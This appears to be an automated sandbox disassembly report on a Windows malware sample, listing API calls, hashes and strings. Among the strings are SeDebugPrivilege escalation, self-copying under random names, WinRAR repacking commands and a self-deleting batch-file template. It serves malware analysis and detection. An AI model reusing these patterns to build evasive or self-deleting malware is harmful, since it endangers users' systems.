                          • Instruction ID: 8a37f73f8b6fb9cfb7dd7ac8953c8ae4aa3b2124ccb7f1c32bd8fb38749107a8
                          • Opcode Fuzzy Hash: 3182dff8775149e897b1d6fa8d6d6121ceb5f2f827ade6f490ff56aeb443cf81
                          • Instruction Fuzzy Hash: E2F06836200209ABD720DE26DC04BEB77AEAB52761F10953AF516D5150E730E685CBB0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 646159-646189 VirtualFree 413 64618c-646192 412->413 414 6460c7-6460cf 413->414 415 646198-6461b0 VirtualFree 413->415 414->413 418 6460d5-6460f8 VirtualAlloc 414->418 416 6461b2-6461b4 415->416 417 6461ba-6461c8 415->417 416->417 419 646243-646251 417->419 420 6461ca-6461d7 417->420 435 6460fe-646106 418->435 436 6460fa-6460fc call 6466c8 418->436 423 646264-64626f 419->423 424 646253 419->424 425 6461dd-6461e0 420->425 428 646271-646276 423->428 427 646255-646258 424->427 425->419 429 6461e2-6461f2 425->429 427->423 431 64625a-646262 427->431 432 64627c-646289 428->432 433 646389-6463b1 VirtualProtect 428->433 434 6461f5-6461fe 429->434 431->427 454 646292-646298 432->454 455 64628b 432->455 439 6463b7-6463ba 433->439 437 646200-646203 434->437 438 64620c-646219 434->438 443 646155-646189 VirtualFree 435->443 444 646108-64611d 435->444 436->435 446 646205-646208 437->446 447 64621b-646228 437->447 448 646238-64623f 438->448 440 6463fc-6463ff VirtualProtect 439->440 441 6463bc-6463c2 439->441 453 646400-646416 440->453 441->441 449 6463c4 441->449 443->413 452 64611f-646121 444->452 456 64622a-646236 446->456 457 64620a 446->457 447->448 448->434 451 646241 448->451 449->440 458 6463c6-6463cf 449->458 451->425 459 646151-646154 452->459 460 646123 452->460 461 646420-646425 453->461 462 646418-64641d 453->462 463 6462a2-6462ac 454->463 455->454 456->448 457->448 466 6463d4-6463d8 458->466 467 6463d1 458->467 459->443 460->459 468 646125-646128 460->468 464 6462b1-6462c8 463->464 465 6462ae 463->465 469 646373-646384 464->469 470 6462ce-6462d4 464->470 465->464 471 6463dd-6463e1 466->471 472 6463da 466->472 467->466 473 646134-64613b 468->473 474 64612a-64612e 468->474 469->428 475 6462d6-6462d9 470->475 476 6462da-6462f1 470->476 477 6463e7-6463fa VirtualProtect 471->477 478 6463e3 471->478 472->471 481 646130-646132 473->481 482 64613d-64614f 473->482 474->473 474->481 475->476 484 646365-64636e 476->484 485 6462f3-6462f9 476->485 477->439 477->440 478->477 481->452 482->452 484->463 486 646314-646326 485->486 487 6462fb-64630f 485->487 489 64634c-646360 486->489 490 646328-64634a 486->490 488 646426-6464a9 487->488 499 646519-64651c 488->499 500 6464ab-6464c0 488->500 489->488 490->484 501 646583-646587 499->501 502 64651d-64651e 499->502 506 646535-646537 500->506 507 6464c2 500->507 504 646588-64658b 501->504 505 646522-646533 502->505 508 6465a1-6465a3 504->508 509 64658d-64658f 504->509 505->506 510 646539 506->510 511 64659a 506->511 512 6464c5-6464cd 507->512 513 6464f8 507->513 519 646591-646593 509->519 520 6465b4 510->520 521 64653b-646541 510->521 514 64659b-64659d 511->514 515 646542-646545 512->515 516 6464cf-6464d4 512->516 517 64656c-64656f 513->517 518 6464fa-6464fe 513->518 514->519 522 64659f 514->522 523 64654d-646550 515->523 524 6464d6-6464d9 516->524 525 646517-646518 516->525 527 646572 517->527 518->527 528 646500 518->528 519->514 529 646595 519->529 526 6465be-6465db 520->526 521->515 522->504 523->526 530 646552-646556 523->530 524->523 531 6464db-6464f5 524->531 525->499 537 6465dd-6465f6 526->537 533 646573-646576 527->533 528->505 534 646502 528->534 529->511 535 646578-64657a 530->535 536 646558-646569 530->536 531->513 533->535 534->533 538 646504-646513 534->538 535->537 540 64657c 535->540 536->517 539 6465f7-646608 537->539 538->506 541 646515 538->541 540->539 542 64657e-64657f 540->542 541->525 542->501
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006460DF
                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00646189
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006461A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: Virtual$Free$Alloc
                          • String ID:
                          • API String ID: 1852963964-0
                          • Opcode ID: 0bec5fff425cea0965e71151efcc64b72201ad3484e42206c28093458ce37e82
                          • Instruction ID: ddfec09e1296a5f9dbbe4ceadfcd03c75eafcc1c363635d61e6fddc8d4c6eebb
                          • Opcode Fuzzy Hash: 0bec5fff425cea0965e71151efcc64b72201ad3484e42206c28093458ce37e82
                          • Instruction Fuzzy Hash: DD118F71A00649DFCF358E58CC817DE37A2FF06701F694029EE4A6B391DAB16A81CB95
                          APIs
                          • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,?,?,006413EF), ref: 006411AB
                          • OpenProcessToken.ADVAPI32(00000000,00000028,006413EF,?,?,?,?,?,?,006413EF), ref: 006411BB
                          • AdjustTokenPrivileges.ADVAPI32(006413EF,00000000,?,00000010,00000000,00000000), ref: 006411EB
                          • CloseHandle.KERNEL32(006413EF), ref: 006411FA
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,006413EF), ref: 00641203
                          Strings
                          • C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 006411A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                          • String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe
                          • API String ID: 75692138-246659021
                          • Opcode ID: cf70b1576d95e39c13cb1bb78f13774b3dfa77575267ed07b19a62f8eccd1512
                          • Instruction ID: 62f8c6e87515264ba9a1be5dbd40fc04349099933bbb10bbc43019f9cafb1a86
                          • Opcode Fuzzy Hash: cf70b1576d95e39c13cb1bb78f13774b3dfa77575267ed07b19a62f8eccd1512
                          • Instruction Fuzzy Hash: 440124B9900208EFDB00DFE4DD89AAEBBBAFB05704F204569E606A2250D7709F849B50
                          APIs
                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 006413BC
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006413DA
                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00641448
                            • Part of subcall function 0064119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,?,?,006413EF), ref: 006411AB
                            • Part of subcall function 0064119F: OpenProcessToken.ADVAPI32(00000000,00000028,006413EF,?,?,?,?,?,?,006413EF), ref: 006411BB
                            • Part of subcall function 0064119F: AdjustTokenPrivileges.ADVAPI32(006413EF,00000000,?,00000010,00000000,00000000), ref: 006411EB
                            • Part of subcall function 0064119F: CloseHandle.KERNEL32(006413EF), ref: 006411FA
                            • Part of subcall function 0064119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006413EF), ref: 00641203
                          Strings
                          • C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 006413A8
                          • SeDebugPrivilege, xrefs: 006413D3
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                          • String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe$SeDebugPrivilege
                          • API String ID: 4123949106-703880843
                          • Opcode ID: a95c137bca36f06fe03303fee213202ec6d742691140cff451fabae0b9d3ea5d
                          • Instruction ID: b9ac7a0323c1491a3e904bbef876286f51fed5d755cc186a458c8c5ad57bdb77
                          • Opcode Fuzzy Hash: a95c137bca36f06fe03303fee213202ec6d742691140cff451fabae0b9d3ea5d
                          • Instruction Fuzzy Hash: 2F315271D00219EADF61DFA5CC45FEEBBBAEB86704F204169E504BB281D7709E85CB60
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                          • Instruction ID: 9140eeb8a3c074550536cedc2c915dcccf637867eb044d502bc364ee3aa460f1
                          • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                          • Instruction Fuzzy Hash: EC81B171204B418FC728CF29C8906AABBE3EFD6314F14896DE4EA87791D734A849CB45
                          APIs
                          • strstr.MSVCRT ref: 006423CC
                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00642464
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00642472
                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 006424A8
                          • memset.MSVCRT ref: 006424B9
                          • strrchr.MSVCRT ref: 006424C9
                          • wsprintfA.USER32 ref: 006424DE
                          • strrchr.MSVCRT ref: 006424ED
                          • memset.MSVCRT ref: 006424F2
                          • memset.MSVCRT ref: 00642505
                          • wsprintfA.USER32 ref: 00642524
                          • Sleep.KERNEL32(000007D0), ref: 00642535
                          • Sleep.KERNEL32(000007D0), ref: 0064255D
                          • memset.MSVCRT ref: 0064256E
                          • wsprintfA.USER32 ref: 00642585
                          • memset.MSVCRT ref: 006425A6
                          • wsprintfA.USER32 ref: 006425CA
                          • Sleep.KERNEL32(000007D0), ref: 006425D0
                          • Sleep.KERNEL32(000007D0,?,?), ref: 006425E5
                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006425FC
                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00642611
                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00642642
                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0064265B
                          • SetEndOfFile.KERNEL32 ref: 0064266D
                          • CloseHandle.KERNEL32(00000000), ref: 00642676
                          • RemoveDirectoryA.KERNEL32(?), ref: 00642681
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2203340711-774930870
                          • Opcode ID: 1851913b93b2c186b96a837ac78d3da39d39ede6116d0b587150ecc9332b5eb0
                          • Instruction ID: be6ccd9bbca8cfb2dc653d9ff7daa7b0c253e061e6927752f2fcf476961a7094
                          • Opcode Fuzzy Hash: 1851913b93b2c186b96a837ac78d3da39d39ede6116d0b587150ecc9332b5eb0
                          • Instruction Fuzzy Hash: 1081A0B1504315ABD710EF60EC89FAB7BEEFB89B04F50091AF644D2290D770DA498B66
                          APIs
                          • memset.MSVCRT ref: 00642766
                          • memset.MSVCRT ref: 00642774
                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00642787
                          • wsprintfA.USER32 ref: 006427AB
                            • Part of subcall function 0064185B: GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
                            • Part of subcall function 0064185B: srand.MSVCRT ref: 00641878
                            • Part of subcall function 0064185B: rand.MSVCRT ref: 00641880
                            • Part of subcall function 0064185B: srand.MSVCRT ref: 00641890
                            • Part of subcall function 0064185B: rand.MSVCRT ref: 00641894
                          • wsprintfA.USER32 ref: 006427C6
                          • CopyFileA.KERNEL32(?,00644C80,00000000), ref: 006427D4
                          • wsprintfA.USER32 ref: 006427F4
                            • Part of subcall function 00641973: PathFileExistsA.SHLWAPI(\Nd`Nd,00000000,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641992
                            • Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006419BA
                            • Part of subcall function 00641973: Sleep.KERNEL32(00000064), ref: 006419C6
                            • Part of subcall function 00641973: wsprintfA.USER32 ref: 006419EC
                            • Part of subcall function 00641973: CopyFileA.KERNEL32(?,?,00000000), ref: 00641A00
                            • Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00641A1E
                            • Part of subcall function 00641973: GetFileSize.KERNEL32(?,00000000), ref: 00641A2C
                            • Part of subcall function 00641973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00641A46
                            • Part of subcall function 00641973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00641A65
                          • DeleteFileA.KERNEL32(?,?,00644E54,00644E58), ref: 0064281A
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00644E54,00644E58), ref: 00642832
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                          • API String ID: 692489704-3099098879
                          • Opcode ID: 39f24e5f5140883418f13340403751a754724cfdd35dea3405b3d4281b05f820
                          • Instruction ID: f8c0b6130df711809aac5372c1ff93c04e0d3374d4170fb43b1b3ee5ed3049cb
                          • Opcode Fuzzy Hash: 39f24e5f5140883418f13340403751a754724cfdd35dea3405b3d4281b05f820
                          • Instruction Fuzzy Hash: 022196B6D4022C7BDB10EBA49CCAFDB776EEB05744F4105A1B644E2141E6B0DF848AB4
                          APIs
                            • Part of subcall function 0064185B: GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
                            • Part of subcall function 0064185B: srand.MSVCRT ref: 00641878
                            • Part of subcall function 0064185B: rand.MSVCRT ref: 00641880
                            • Part of subcall function 0064185B: srand.MSVCRT ref: 00641890
                            • Part of subcall function 0064185B: rand.MSVCRT ref: 00641894
                          • wsprintfA.USER32 ref: 006415AA
                          • wsprintfA.USER32 ref: 006415C6
                          • lstrlen.KERNEL32(?), ref: 006415D2
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006415EE
                          • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00641609
                          • CloseHandle.KERNEL32(00000000), ref: 00641612
                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0064162D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mXfByV.exe$open
                          • API String ID: 617340118-2700022502
                          • Opcode ID: a1232c28eaa3b826a8445e6f51daaaa689747ab8d2467bb769dcdc31b1851038
                          • Instruction ID: ab772d58c2dd8f72590635b0638233ebc84fcd8882f17987bc4283ba0d729fd9
                          • Opcode Fuzzy Hash: a1232c28eaa3b826a8445e6f51daaaa689747ab8d2467bb769dcdc31b1851038
                          • Instruction Fuzzy Hash: B8117376A01138BFD72097A49C89EEB7B6EDF5A750F010151F549E3240DA709BC48BB0
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00641400), ref: 00641226
                          • GetProcAddress.KERNEL32(00000000), ref: 0064122D
                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00641400), ref: 0064123F
                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00641400), ref: 00641250
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,00641400), ref: 0064129E
                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,00641400), ref: 006412B0
                          • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,00641400), ref: 006412F5
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00641400), ref: 0064130A
                          Strings
                          • ZwQuerySystemInformation, xrefs: 00641212
                          • C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 00641262
                          • ntdll.dll, xrefs: 00641219
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                          • String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe$ZwQuerySystemInformation$ntdll.dll
                          • API String ID: 1500695312-2000334012
                          • Opcode ID: e1718ca142d20c645c43567560112469e97744ee5e005ca05b6994294e11cff1
                          • Instruction ID: 9d71babf264dafe4d4430a490edeb82c50b935e32e6cda6ed892003f00e3f7ea
                          • Opcode Fuzzy Hash: e1718ca142d20c645c43567560112469e97744ee5e005ca05b6994294e11cff1
                          • Instruction Fuzzy Hash: 7A21D531605321ABD7209F65CC08BABBAAAFB87F00F100A19F545EB340D7B0DAC4C7A5
                          APIs
                          • memset.MSVCRT ref: 006418B1
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 006418D3
                          • CloseHandle.KERNEL32(I%d), ref: 006418E9
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006418F0
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00641901
                          • CloseHandle.KERNEL32(?), ref: 0064190A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                          • String ID: I%d
                          • API String ID: 876959470-572922619
                          • Opcode ID: af8d0d7a8f8f7e8737f4c501911e999197b6c2945cb57d7cc08d2697f89ba24e
                          • Instruction ID: 3108bbf25e3957ae98d625b056a47ec5c8d23b6306ef67d5e43b962562177776
                          • Opcode Fuzzy Hash: af8d0d7a8f8f7e8737f4c501911e999197b6c2945cb57d7cc08d2697f89ba24e
                          • Instruction Fuzzy Hash: 40014F76901128BBCB21ABD6DC48DDFBF7EFF86770F104121FA15A52A0D6714A58CBA0
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006429DB,?,00000001), ref: 006426A7
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006429DB,?,00000001), ref: 006426B5
                          • lstrlen.KERNEL32(?), ref: 006426C4
                          • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 006426CE
                          • lstrcpy.KERNEL32(00000004,?), ref: 006426E3
                          • lstrcpy.KERNEL32(?,00000004), ref: 0064271F
                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0064272D
                          • SetEvent.KERNEL32 ref: 0064273C
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                          • String ID:
                          • API String ID: 41106472-0
                          • Opcode ID: 60604f2dcf195fa265c3ecca6f406ca3625f26d9fd480e61a9d6afd19944ccf5
                          • Instruction ID: cd5f6fa3ed088813c1dea6f231c9f592c161548be1003763c48598d251f1e28d
                          • Opcode Fuzzy Hash: 60604f2dcf195fa265c3ecca6f406ca3625f26d9fd480e61a9d6afd19944ccf5
                          • Instruction Fuzzy Hash: 2811B239500111EFCB319F14EC4A99A7BABFF96B607615119F45497720DB308D86CB50
                          APIs
                          • srand.MSVCRT ref: 00641BCD
                          • rand.MSVCRT ref: 00641BD8
                          • memset.MSVCRT ref: 00641C43
                          • memcpy.MSVCRT(?,FJpQMPYrrnlWAeVPISpNEPqvGqxjIaCOKThtsDHyjyidJZkwOmAgAThaoiKLXYlFwuVvfutEDRznbVsZFyuCMJxegSLLcUDpeGOUwYnfBXNIUMSRBRKCXGocjbqhWEgrtmxbZHzokWQQmlkNvcdBHsiTazdf,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00641C4F
                          • lstrcat.KERNEL32(?,.exe), ref: 00641C5D
                          Strings
                          • FJpQMPYrrnlWAeVPISpNEPqvGqxjIaCOKThtsDHyjyidJZkwOmAgAThaoiKLXYlFwuVvfutEDRznbVsZFyuCMJxegSLLcUDpeGOUwYnfBXNIUMSRBRKCXGocjbqhWEgrtmxbZHzokWQQmlkNvcdBHsiTazdf, xrefs: 00641B8A, 00641B9C, 00641C15, 00641C49
                          • .exe, xrefs: 00641C57
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: lstrcatmemcpymemsetrandsrand
                          • String ID: .exe$FJpQMPYrrnlWAeVPISpNEPqvGqxjIaCOKThtsDHyjyidJZkwOmAgAThaoiKLXYlFwuVvfutEDRznbVsZFyuCMJxegSLLcUDpeGOUwYnfBXNIUMSRBRKCXGocjbqhWEgrtmxbZHzokWQQmlkNvcdBHsiTazdf
                          • API String ID: 122620767-31980111
                          • Opcode ID: c7022b2d813df3070c27857e67e22afe55918c44b7d6db001a93aef22e35d492
                          • Instruction ID: 50fd5023f75ed7c5a98f060badc0b951e29f714a63e90ab33a64480b0335c5ce
                          • Opcode Fuzzy Hash: c7022b2d813df3070c27857e67e22afe55918c44b7d6db001a93aef22e35d492
                          • Instruction Fuzzy Hash: DD21A036E446A06ED3251335AC82BED3F47CFE3B11F1650ADF5852F792D96409C28264
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00641334
                          • GetProcAddress.KERNEL32(00000000), ref: 0064133B
                          • memset.MSVCRT ref: 00641359
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcmemset
                          • String ID: NtSystemDebugControl$ntdll.dll
                          • API String ID: 3137504439-2438149413
